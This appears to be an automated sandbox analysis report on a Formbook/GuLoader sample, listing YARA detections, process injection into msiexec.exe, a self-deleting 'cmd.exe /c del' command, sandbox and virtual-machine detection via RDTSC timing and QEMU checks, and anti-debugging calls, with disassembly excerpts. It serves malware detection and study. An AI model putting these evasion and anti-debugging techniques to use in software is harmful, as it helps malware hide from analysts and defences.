    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
    Source: 2eD17GZuWs.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 2eD17GZuWs.exe Virustotal: Detection: 25%
    Source: unknown Process created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknown Process created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknown Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
    Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: Binary string: msiexec.pdb source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp
    Source: Binary string: msiexec.pdbGCTL source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: 2eD17GZuWs.exe, 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, msiexec.exe, 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: 2eD17GZuWs.exe, msiexec.exe
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match File source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara match File source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Yara detected VB6 Downloader Generic
    Source: Yara match File source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara match File source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_0040984F push ecx; retf 0_2_004098B0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00409D50 push edi; ret 0_2_00409D5D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00409D55 push edi; ret 0_2_00409D5D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00406910 pushad ; iretd 0_2_00406914
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_004069F5 push EF15CAC2h; ret 0_2_00406A05
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_0040759B push FFFFFFC6h; ret 0_2_004075A2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00406653 pushad ; iretd 0_2_00406654
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00406A98 pushfd ; ret 0_2_00406A9A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_004082AF push FFFFFFDAh; ret 0_2_004082B2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_0040A3DA push ecx; retf 0_2_0040A3DC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00407FAA push esp; ret 0_2_00407FB1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_00407FB3 push ecx; retf 0_2_00407FBC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 1_2_1E19D0D1 push ecx; ret 1_2_1E19D0E4
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0512D0D1 push ecx; ret 13_2_0512D0E4
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_011169BB push esi; ret 13_2_011169BC
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0110AB07 push ds; retf 13_2_0110AB09
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0111CF5C push eax; ret 13_2_0111CF62
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01114E05 push ss; retf 13_2_01114E06
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0111CEA5 push eax; ret 13_2_0111CEF8
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0111CEF2 push eax; ret 13_2_0111CEF8
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0111CEFB push eax; ret 13_2_0111CF62
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe File opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe File opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: 2eD17GZuWs.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 00000000021D4F13 second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA87CD1247Ch 0x0000001c call 00007FA87CD1244Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 00000000021D4FA0 second address: 00000000021D4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CD1284Dh 0x0000001f popad 0x00000020 call 00007FA87CD12521h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 0000000000564FA0 second address: 0000000000564FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CCF94CDh 0x0000001f popad 0x00000020 call 00007FA87CCF91A1h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exe RDTSC instruction interceptor: First address: 00000000011098E4 second address: 00000000011098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exe RDTSC instruction interceptor: First address: 0000000001109B4E second address: 0000000001109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_021D044B rdtsc 0_2_021D044B
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.894315754.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 2eD17GZuWs.exe, 00000001.00000003.927010291.0000000000948000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000A.00000002.940809736.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
    Source: 2eD17GZuWs.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process information queried: ProcessInformation

    Anti Debugging:

    Contains functionality to hide a thread from the debugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_021D06B1 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000,0_2_021D06B1
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Process queried: DebugPort
    Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_021D044B rdtsc 0_2_021D044B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: 0_2_021D3746 LdrInitializeThunk,0_2_021D3746
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]1_2_1E21740D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]1_2_1E21740D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]1_2_1E21740D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17BC2C mov eax, dword ptr fs:[00000030h]1_2_1E17BC2C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DC450 mov eax, dword ptr fs:[00000030h]1_2_1E1DC450
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DC450 mov eax, dword ptr fs:[00000030h]1_2_1E1DC450
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A44B mov eax, dword ptr fs:[00000030h]1_2_1E17A44B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16746D mov eax, dword ptr fs:[00000030h]1_2_1E16746D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15849B mov eax, dword ptr fs:[00000030h]1_2_1E15849B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2014FB mov eax, dword ptr fs:[00000030h]1_2_1E2014FB
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E1C6CF0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E1C6CF0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E1C6CF0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218CD6 mov eax, dword ptr fs:[00000030h]1_2_1E218CD6
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218D34 mov eax, dword ptr fs:[00000030h]1_2_1E218D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20E539 mov eax, dword ptr fs:[00000030h]1_2_1E20E539
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AD30 mov eax, dword ptr fs:[00000030h]1_2_1E14AD30
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1CA537 mov eax, dword ptr fs:[00000030h]1_2_1E1CA537
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]1_2_1E174D3B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]1_2_1E174D3B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]1_2_1E174D3B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E167D50 mov eax, dword ptr fs:[00000030h]1_2_1E167D50
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E183D43 mov eax, dword ptr fs:[00000030h]1_2_1E183D43
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C3540 mov eax, dword ptr fs:[00000030h]1_2_1E1C3540
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1F3D40 mov eax, dword ptr fs:[00000030h]1_2_1E1F3D40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C577 mov eax, dword ptr fs:[00000030h]1_2_1E16C577
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C577 mov eax, dword ptr fs:[00000030h]1_2_1E16C577
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FD9B mov eax, dword ptr fs:[00000030h]1_2_1E17FD9B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FD9B mov eax, dword ptr fs:[00000030h]1_2_1E17FD9B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2105AC mov eax, dword ptr fs:[00000030h]1_2_1E2105AC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2105AC mov eax, dword ptr fs:[00000030h]1_2_1E2105AC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]1_2_1E171DB5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]1_2_1E171DB5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]1_2_1E171DB5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1735A1 mov eax, dword ptr fs:[00000030h]1_2_1E1735A1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov ecx, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1F8DF1 mov eax, dword ptr fs:[00000030h]1_2_1E1F8DF1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E15D5E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E15D5E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AA16 mov eax, dword ptr fs:[00000030h]1_2_1E14AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AA16 mov eax, dword ptr fs:[00000030h]1_2_1E14AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov eax, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov ecx, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov eax, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov eax, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E163A1C mov eax, dword ptr fs:[00000030h]1_2_1E163A1C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E158A0A mov eax, dword ptr fs:[00000030h]1_2_1E158A0A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E184A2C mov eax, dword ptr fs:[00000030h]1_2_1E184A2C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E184A2C mov eax, dword ptr fs:[00000030h]1_2_1E184A2C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AA16 mov eax, dword ptr fs:[00000030h]1_2_1E20AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AA16 mov eax, dword ptr fs:[00000030h]1_2_1E20AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
